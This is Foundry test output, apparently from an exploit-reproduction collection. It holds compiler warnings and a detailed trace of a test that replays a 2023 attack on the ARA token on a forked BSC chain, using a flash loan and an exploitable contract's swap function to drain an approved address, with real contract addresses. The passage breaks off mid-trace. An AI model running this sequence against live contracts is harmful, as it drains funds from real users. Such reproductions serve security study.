Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.59s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/ARA_exp.sol:68:31:
   |
68 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/ARA_exp.sol:68:47:
   |
68 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                               ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/ARA_exp.sol:68:88:
   |
68 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                                        ^^^^^^^^^^^^^^^^^^^

Warning (2072): Unused local variable.
  --> src/test/2023-06/ARA_exp.sol:91:24:
   |
91 |         (bool success, bytes memory retData) = exploitableSwapContract.call(
   |                        ^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 967.91ms (3.79ms CPU time)

Ran 1 test for src/test/2023-06/ARA_exp.sol:ARATest
[PASS] testExploit() (gas: 2424506)
Logs:
  Attacker BUSDT balance before hack: 0.000000000000000000
  Step 3. ARA amount out after first V3 swap: 504468.158749078470704724
  Step 5. BUSDT amount out after second V3 swap: 1327615.916109788911433948
  Attacker BUSDT balance after hack: 124914.916109788911433948

Traces:
  [19491] ARATest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 29214010 [2.921e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(BUSDT: [0x55d398326f99059fF775485246999027B3197955], "BUSDT")
    │   └─ ← [Return]
    ├─ [0] VM::label(ARA: [0x5542958FA9bD89C96cB86D1A6Cb7a3e644a3d46e], "ARA")
    │   └─ ← [Return]
    ├─ [0] VM::label(Router: [0x13f4EA83D0bd40E75C8222255bc855a974568Dd4], "Router")
    │   └─ ← [Return]
    ├─ [0] VM::label(DPPOracle: [0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A], "DPPOracle")
    │   └─ ← [Return]
    ├─ [0] VM::label(Exploitable Contract: [0x7BA5dd9Bb357aFa2231446198c75baC17CEfCda9], "Exploitable Contract")
    │   └─ ← [Return]
    ├─ [0] VM::label(Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0], "Approved Address")
    │   └─ ← [Return]
    └─ ← [Stop]

  [2626806] ARATest::testExploit()
    ├─ [2531] BUSDT::balanceOf(ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 10000000000000000 [1e16]
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [531] BUSDT::balanceOf(ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 10000000000000000 [1e16]
    ├─ [0] VM::accesses(BUSDT: [0x55d398326f99059fF775485246999027B3197955])
    │   └─ ← [Return] [0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96], []
    ├─ [0] VM::load(BUSDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000002386f26fc10000
    ├─ [0] VM::load(BUSDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000002386f26fc10000
    ├─ [531] BUSDT::balanceOf(ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 10000000000000000 [1e16]
    ├─ [0] VM::store(BUSDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [531] BUSDT::balanceOf(ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(BUSDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x000000000000000000000000000000000000000000000000002386f26fc10000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: BUSDT: [0x55d398326f99059fF775485246999027B3197955], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 81201235000773904770131445719184449197250777359516868712991521815545917127830 [8.12e76])
    ├─ [0] VM::load(BUSDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000002386f26fc10000
    ├─ [0] VM::store(BUSDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [531] BUSDT::balanceOf(ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [24562] BUSDT::approve(Router: [0x13f4EA83D0bd40E75C8222255bc855a974568Dd4], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Router: [0x13f4EA83D0bd40E75C8222255bc855a974568Dd4], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x5bdf7cb53d1a063ed4e3801e72a52d5382758fb90255758bc15cd29f1c9e556b: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [31870] ARA::approve(Router: [0x13f4EA83D0bd40E75C8222255bc855a974568Dd4], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Router: [0x13f4EA83D0bd40E75C8222255bc855a974568Dd4], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x3f343b370308efd45a7ea9c2c72d9909f4c0f8ce132b412a6ca38dd339d619d3: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [531] BUSDT::balanceOf(ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [2425] BUSDT::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker BUSDT balance before hack", val: 0, decimals: 18)
    ├─ [2271114] DPPOracle::flashLoan(0, 1202701000000000000000000 [1.202e24], ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [8071] BUSDT::transfer(ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1202701000000000000000000 [1.202e24])
    │   │   ├─ emit Transfer(from: DPPOracle: [0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A], to: ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1202701000000000000000000 [1.202e24])
    │   │   ├─  storage changes:
    │   │   │   @ 0xe15794f9863f61e2b79c6824f1e1c5aa8ab443721329bf1566a811b7d14c4bd5: 0x00000000000000000000000000000000000000000000feae90d8bcb569268635 → 0x000000000000000000000000000000000000000000000000039287b4c1128635
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000feae8d463500a8140000
    │   │   └─ ← [Return] true
    │   ├─ [2236706] ARATest::DPPFlashLoanCall(ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 1202701000000000000000000 [1.202e24], 0x00)
    │   │   ├─ [380092] Exploitable Contract::swapExactInputSingle(163497000000000000000000 [1.634e23], 0, ARA: [0x5542958FA9bD89C96cB86D1A6Cb7a3e644a3d46e], Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0])
    │   │   │   ├─ [3923] ARA::allowance(Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0], Exploitable Contract: [0x7BA5dd9Bb357aFa2231446198c75baC17CEfCda9]) [staticcall]
    │   │   │   │   └─ ← [Return] 999999999999999999999999999999999979597100000000000000 [9.999e53]
    │   │   │   ├─ [3923] ARA::allowance(Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0], Router: [0x13f4EA83D0bd40E75C8222255bc855a974568Dd4]) [staticcall]
    │   │   │   │   └─ ← [Return] 1000000000000000000000000000000000000000000000000000000 [1e54]
    │   │   │   ├─ [41733] ARA::transferFrom(Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0], Exploitable Contract: [0x7BA5dd9Bb357aFa2231446198c75baC17CEfCda9], 163497000000000000000000 [1.634e23])
    │   │   │   │   ├─ emit Transfer(from: Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0], to: Exploitable Contract: [0x7BA5dd9Bb357aFa2231446198c75baC17CEfCda9], value: 163497000000000000000000 [1.634e23])
    │   │   │   │   ├─ emit Approval(owner: Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0], spender: Exploitable Contract: [0x7BA5dd9Bb357aFa2231446198c75baC17CEfCda9], value: 999999999999999999999999999999836482597100000000000000 [9.999e53])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x71383d1c057cf0b4c97ed36d7d9b0424b50b9502c53534cc3c1863f59c6a38d2: 0 → 0x00000000000000000000000000000000000000000000229f30ac57c4b9040000
    │   │   │   │   │   @ 0x9a831cc2f5d2f05a627cba9df345334a907df40ff101edecde4ec2b85ab71abc: 0x0000000000000000000a70c3c40a64e6c51999090b65f67c771a568c982ec000 → 0x0000000000000000000a70c3c40a64e6c51999090b65d3dd466dfec7df2ac000
    │   │   │   │   │   @ 0x3ae39dbd065b56ec1c5a04f06f92b213843ad4402e7456164f5c0a2770b0ee5c: 0x00000000000000000000000000000000000000000000229f3cc2794c8e8eccb3 → 0x0000000000000000000000000000000000000000000000000c162187d58accb3
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [25870] ARA::approve(Router: [0x13f4EA83D0bd40E75C8222255bc855a974568Dd4], 163497000000000000000000 [1.634e23])
    │   │   │   │   ├─ emit Approval(owner: Exploitable Contract: [0x7BA5dd9Bb357aFa2231446198c75baC17CEfCda9], spender: Router: [0x13f4EA83D0bd40E75C8222255bc855a974568Dd4], value: 163497000000000000000000 [1.634e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xbc852a317d461eece0becc7adee26f44b4b8dbc81c8a263df1d2d1bc4131b0af: 0 → 0x00000000000000000000000000000000000000000000229f30ac57c4b9040000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [284129] Router::exactInputSingle(ExactInputSingleParams({ tokenIn: 0x5542958FA9bD89C96cB86D1A6Cb7a3e644a3d46e, tokenOut: 0x55d398326f99059fF775485246999027B3197955, fee: 100, recipient: 0xB817Ef68d764F150b8d73A2ad7ce9269674538E0, amountIn: 163497000000000000000000 [1.634e23], amountOutMinimum: 0, sqrtPriceLimitX96: 0 }))
    │   │   │   │   ├─ [1763] 0xdAecee3C08e953Bd5f89A5Cc90ac560413d709E3::getPool(0x41ff9AA7e16B8B1a8a8dc4f0eFacd93D02d071c9, ARA: [0x5542958FA9bD89C96cB86D1A6Cb7a3e644a3d46e], BUSDT: [0x55d398326f99059fF775485246999027B3197955], 100) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000092974438c330d5c6790b4260e358e84513109872
    │   │   │   │   ├─ [267361] 0x92974438C330d5c6790b4260e358e84513109872::swap(Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0], true, 163497000000000000000000 [1.634e23], 4295128740 [4.295e9], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007ba5dd9bb357afa2231446198c75bac17cefcda9000000000000000000000000000000000000000000000000000000000000002b5542958fa9bd89c96cb86d1a6cb7a3e644a3d46e00006455d398326f99059ff775485246999027b3197955000000000000000000000000000000000000000000)
    │   │   │   │   │   ├─ [12871] BUSDT::transfer(Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0], 123246441384491531023703 [1.232e23])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x92974438C330d5c6790b4260e358e84513109872, to: Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0], value: 123246441384491531023703 [1.232e23])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x7cb93ad7b6e051e93f8e984994a4a0835a34cdb194e9b143700f7b82c734a411: 0x0000000000000000000000000000000000000000000069b6532e3c2677c5d9c9 → 0x000000000000000000000000000000000000000000004f9d1f38109663bb2472
    │   │   │   │   │   │   │   @ 0xe61b5ade45c1c09e562f5c0ce1ef38be9780f93f8d564f0cc490b05aec410af3: 0x0000000000000000000000000000000000000000000001e13832ee470135a8d5 → 0x000000000000000000000000000000000000000000001bfa6c2919d715405e2c
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [3353] ARA::balanceOf(0x92974438C330d5c6790b4260e358e84513109872) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 498700441845375704016457 [4.987e23]
    │   │   │   │   │   ├─ [18996] Router::pancakeV3SwapCallback(163497000000000000000000 [1.634e23], -123246441384491531023703 [-1.232e23], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007ba5dd9bb357afa2231446198c75bac17cefcda9000000000000000000000000000000000000000000000000000000000000002b5542958fa9bd89c96cb86d1a6cb7a3e644a3d46e00006455d398326f99059ff775485246999027b3197955000000000000000000000000000000000000000000)
    │   │   │   │   │   │   ├─ [1983] 0xdAecee3C08e953Bd5f89A5Cc90ac560413d709E3::verifyCallback(0x41ff9AA7e16B8B1a8a8dc4f0eFacd93D02d071c9, ARA: [0x5542958FA9bD89C96cB86D1A6Cb7a3e644a3d46e], BUSDT: [0x55d398326f99059fF775485246999027B3197955], 100) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000092974438c330d5c6790b4260e358e84513109872
    │   │   │   │   │   │   ├─ [13033] ARA::transferFrom(Exploitable Contract: [0x7BA5dd9Bb357aFa2231446198c75baC17CEfCda9], 0x92974438C330d5c6790b4260e358e84513109872, 163497000000000000000000 [1.634e23])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: Exploitable Contract: [0x7BA5dd9Bb357aFa2231446198c75baC17CEfCda9], to: 0x92974438C330d5c6790b4260e358e84513109872, value: 163497000000000000000000 [1.634e23])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: Exploitable Contract: [0x7BA5dd9Bb357aFa2231446198c75baC17CEfCda9], spender: Router: [0x13f4EA83D0bd40E75C8222255bc855a974568Dd4], value: 0)
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x5ab05222bc01bbd07dcce9f87514d2d92fe8defb2f86be3bd27702c0c7e0ce2a: 0x00000000000000000000000000000000000000000000699a9ae95e30012ca649 → 0x000000000000000000000000000000000000000000008c39cb95b5f4ba30a649
    │   │   │   │   │   │   │   │   @ 0x71383d1c057cf0b4c97ed36d7d9b0424b50b9502c53534cc3c1863f59c6a38d2: 0x00000000000000000000000000000000000000000000229f30ac57c4b9040000 → 0
    │   │   │   │   │   │   │   │   @ 0xbc852a317d461eece0becc7adee26f44b4b8dbc81c8a263df1d2d1bc4131b0af: 0x00000000000000000000000000000000000000000000229f30ac57c4b9040000 → 0
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [1353] ARA::balanceOf(0x92974438C330d5c6790b4260e358e84513109872) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 662197441845375704016457 [6.621e23]
    │   │   │   │   │   ├─ emit Swap(param0: Router: [0x13f4EA83D0bd40E75C8222255bc855a974568Dd4], param1: Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0], param2: 163497000000000000000000 [1.634e23], param3: -123246441384491531023703 [-1.232e23], param4: 59698729396040899791791441490 [5.969e28], param5: 498956032713225615053170 [4.989e23], param6: -5661, param7: 5395400999999999992 [5.395e18], param8: 0)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0: 0x00000000010001000000000a0000000000000001002196a8a1b43003f6ef52cf → 0x000000000100010000ffe9e30000000000000000c0e5a1ad4a6412752f6dc652
    │   │   │   │   │   │   @ 2: 0x00000000000000000000000000000000000000416aea1e64cc93373753955c0f → 0x0000000000000000000000000000000000017097022620d0a5c4d22e46c6309e
    │   │   │   │   │   │   @ 4: 0x0000000000000000001c70d82f45d194000000000000000000039c7a6d7ca477 → 0x0000000000000000001c70d82f45d19400000000000000004ae3ed1a0746346f
    │   │   │   │   │   │   @ 9: 0x0100000000000000000000000797206897284b3f4d0000000000cabc648f23a9 → 0x01000000000000000000000007bb8bc4aaabd1f4a90000000001610c648f32b1
    │   │   │   │   │   └─ ← [Return] 163497000000000000000000 [1.634e23], -123246441384491531023703 [-1.232e23]
    │   │   │   │   └─ ← [Return] 123246441384491531023703 [1.232e23]
    │   │   │   ├─  emit topic 0: 0x871ef507e8bf6dab3183ea49a907b33c82d681ebf93cdbbf010deb686990d6c0
    │   │   │   │           data: 0x00000000000000000000000000000000000000000000229f30ac57c4b90400000000000000000000000000000000000000000000000000000000000000000012000000000000000000000000000000000000000000001a1933f62b90140ab55700000000000000000000000000000000000000000000000000000000000000120000000000000000000000005542958fa9bd89c96cb86d1a6cb7a3e644a3d46e00000000000000000000000055d398326f99059ff775485246999027b3197955000000000000000000000000b817ef68d764f150b8d73a2ad7ce9269674538e0
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x9a831cc2f5d2f05a627cba9df345334a907df40ff101edecde4ec2b85ab71abc: 0x0000000000000000000a70c3c40a64e6c51999090b65f67c771a568c982ec000 → 0x0000000000000000000a70c3c40a64e6c51999090b65d3dd466dfec7df2ac000
    │   │   │   │   @ 0xbc852a317d461eece0becc7adee26f44b4b8dbc81c8a263df1d2d1bc4131b0af: 0 → 0x00000000000000000000000000000000000000000000229f30ac57c4b9040000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [912269] Router::exactInputSingle(ExactInputSingleParams({ tokenIn: 0x55d398326f99059fF775485246999027B3197955, tokenOut: 0x5542958FA9bD89C96cB86D1A6Cb7a3e644a3d46e, fee: 100, recipient: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, amountIn: 1202701000000000000000000 [1.202e24], amountOutMinimum: 0, sqrtPriceLimitX96: 0 }))
    │   │   │   ├─ [1772] 0xdAecee3C08e953Bd5f89A5Cc90ac560413d709E3::getPool(0x41ff9AA7e16B8B1a8a8dc4f0eFacd93D02d071c9, BUSDT: [0x55d398326f99059fF775485246999027B3197955], ARA: [0x5542958FA9bD89C96cB86D1A6Cb7a3e644a3d46e], 100) [delegatecall]
    │   │   │   │   └─ ← [Return] 0x00000000000000000000000092974438c330d5c6790b4260e358e84513109872
    │   │   │   ├─ [902472] 0x92974438C330d5c6790b4260e358e84513109872::swap(ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], false, 1202701000000000000000000 [1.202e24], 1461446703485210103287273052203988822378723970341 [1.461e48], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002b55d398326f99059ff775485246999027b31979550000645542958fa9bd89c96cb86d1a6cb7a3e644a3d46e000000000000000000000000000000000000000000)
    │   │   │   │   ├─ [27631] ARA::transfer(ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 504468158749078470704724 [5.044e23])
    │   │   │   │   │   ├─ emit Transfer(from: 0x92974438C330d5c6790b4260e358e84513109872, to: ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 504468158749078470704724 [5.044e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5ab05222bc01bbd07dcce9f87514d2d92fe8defb2f86be3bd27702c0c7e0ce2a: 0x000000000000000000000000000000000000000000008c39cb95b5f4ba30a649 → 0x00000000000000000000000000000000000000000000216685859a864db5e7f5
    │   │   │   │   │   │   @ 0x5f6eee5777689fac8d5a6d5f66349ac0b0aaf490b4d918486710d1c6412d3a72: 0 → 0x000000000000000000000000000000000000000000006ad346101b6e6c7abe54
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] BUSDT::balanceOf(0x92974438C330d5c6790b4260e358e84513109872) [staticcall]
    │   │   │   │   │   └─ ← [Return] 375965340532526347396210 [3.759e23]
    │   │   │   │   ├─ [12027] Router::pancakeV3SwapCallback(-504468158749078470704724 [-5.044e23], 1202701000000000000000000 [1.202e24], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002b55d398326f99059ff775485246999027b31979550000645542958fa9bd89c96cb86d1a6cb7a3e644a3d46e000000000000000000000000000000000000000000)
    │   │   │   │   │   ├─ [1992] 0xdAecee3C08e953Bd5f89A5Cc90ac560413d709E3::verifyCallback(0x41ff9AA7e16B8B1a8a8dc4f0eFacd93D02d071c9, BUSDT: [0x55d398326f99059fF775485246999027B3197955], ARA: [0x5542958FA9bD89C96cB86D1A6Cb7a3e644a3d46e], 100) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000092974438c330d5c6790b4260e358e84513109872
    │   │   │   │   │   ├─ [6034] BUSDT::transferFrom(ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x92974438C330d5c6790b4260e358e84513109872, 1202701000000000000000000 [1.202e24])
    │   │   │   │   │   │   ├─ emit Transfer(from: ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x92974438C330d5c6790b4260e358e84513109872, value: 1202701000000000000000000 [1.202e24])
    │   │   │   │   │   │   ├─ emit Approval(owner: ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Router: [0x13f4EA83D0bd40E75C8222255bc855a974568Dd4], value: 115792089237316195423570985008687907853269984665640562836756584007913129639935 [1.157e77])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x5bdf7cb53d1a063ed4e3801e72a52d5382758fb90255758bc15cd29f1c9e556b: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffff015172b9caff57ebffff
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000feae8d463500a8140000 → 0
    │   │   │   │   │   │   │   @ 0x7cb93ad7b6e051e93f8e984994a4a0835a34cdb194e9b143700f7b82c734a411: 0x000000000000000000000000000000000000000000004f9d1f38109663bb2472 → 0x000000000000000000000000000000000000000000014e4bac7e45970bcf2472
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [531] BUSDT::balanceOf(0x92974438C330d5c6790b4260e358e84513109872) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1578666340532526347396210 [1.578e24]
    │   │   │   │   ├─ emit Swap(param0: Router: [0x13f4EA83D0bd40E75C8222255bc855a974568Dd4], param1: ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: -504468158749078470704724 [-5.044e23], param3: 1202701000000000000000000 [1.202e24], param4: 250653954422452983427442157516 [2.506e29], param5: 498956032713225615053170 [4.989e23], param6: 23035 [2.303e4], param7: 0, param8: 39689132999999999964 [3.968e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 3: 0x00000000000000000000000000000000000000d4ed95b39d3927937571bd87c2 → 0x00000000000000000000000000000000000a96566ce180d4edf4ea7d377a946b
    │   │   │   │   │   @ 4: 0x0000000000000000001c70d82f45d19400000000000000004ae3ed1a0746346f → 0x000000000000000226e89106a381a17000000000000000004ae3ed1a0746346f
    │   │   │   │   │   @ 0: 0x000000000100010000ffe9e30000000000000000c0e5a1ad4a6412752f6dc652 → 0x0000000001000100000059fb000000000000000329e817705866072ac5ec27cc
    │   │   │   │   └─ ← [Return] -504468158749078470704724 [-5.044e23], 1202701000000000000000000 [1.202e24]
    │   │   │   └─ ← [Return] 504468158749078470704724 [5.044e23]
    │   │   ├─ [1353] ARA::balanceOf(ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 504468158749078470704724 [5.044e23]
    │   │   ├─ [2648] ARA::decimals() [staticcall]
    │   │   │   └─ ← [Return] 18
    │   │   ├─ emit log_named_decimal_uint(key: "Step 3. ARA amount out after first V3 swap", val: 504468158749078470704724 [5.044e23], decimals: 18)
    │   │   ├─ [179561] Exploitable Contract::swapExactInputSingle(132123000000000000000000 [1.321e23], 0, BUSDT: [0x55d398326f99059fF775485246999027B3197955], Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0])
    │   │   │   ├─ [2638] BUSDT::allowance(Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0], Exploitable Contract: [0x7BA5dd9Bb357aFa2231446198c75baC17CEfCda9]) [staticcall]
    │   │   │   │   └─ ← [Return] 999999999999999999999999999999999768327700000000000000 [9.999e53]
    │   │   │   ├─ [2638] BUSDT::allowance(Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0], Router: [0x13f4EA83D0bd40E75C8222255bc855a974568Dd4]) [staticcall]
    │   │   │   │   └─ ← [Return] 1000000000000000000000000000000000000000000000000000000 [1e54]
    │   │   │   ├─ [30734] BUSDT::transferFrom(Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0], Exploitable Contract: [0x7BA5dd9Bb357aFa2231446198c75baC17CEfCda9], 132123000000000000000000 [1.321e23])
